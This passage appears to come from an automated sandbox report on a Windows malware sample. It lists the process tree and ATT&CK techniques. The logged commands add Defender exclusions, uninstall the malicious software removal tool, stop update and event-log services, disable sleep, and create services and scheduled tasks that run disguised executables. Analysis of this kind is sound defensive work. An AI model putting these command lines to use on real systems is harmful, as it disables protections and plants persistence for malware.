        8⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2084
- - C:\Users\Admin\AppData\Roaming\conhostsft.exe
    "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:3104
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:216
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4804
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1092
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2768
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2180
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3660
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2440
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:1308
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:4692
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3152
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:3948
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "driverupdate"
      4⤵
      Launches sc.exe
      PID:3664
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:432
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2656
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "driverupdate"
      4⤵
      Launches sc.exe
      PID:4092
- - C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
    "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3660
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 5 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\ChainReview\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\System\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\System\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:760

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4228
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:720
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2440
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3772
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3664
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4952
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1784
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4140
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4908
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4288
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1992
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2216
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4000

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1816

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1176
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdccf1cc40,0x7ffdccf1cc4c,0x7ffdccf1cc58
  2⤵
  PID:5204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1868,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1864 /prefetch:2
  2⤵
  PID:5424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1964,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2464 /prefetch:8
  2⤵
  PID:5480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:5668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3712,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4592 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4848,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4860 /prefetch:8
  2⤵
  PID:3924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  PID:4032

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

Query Registry

System Information Discovery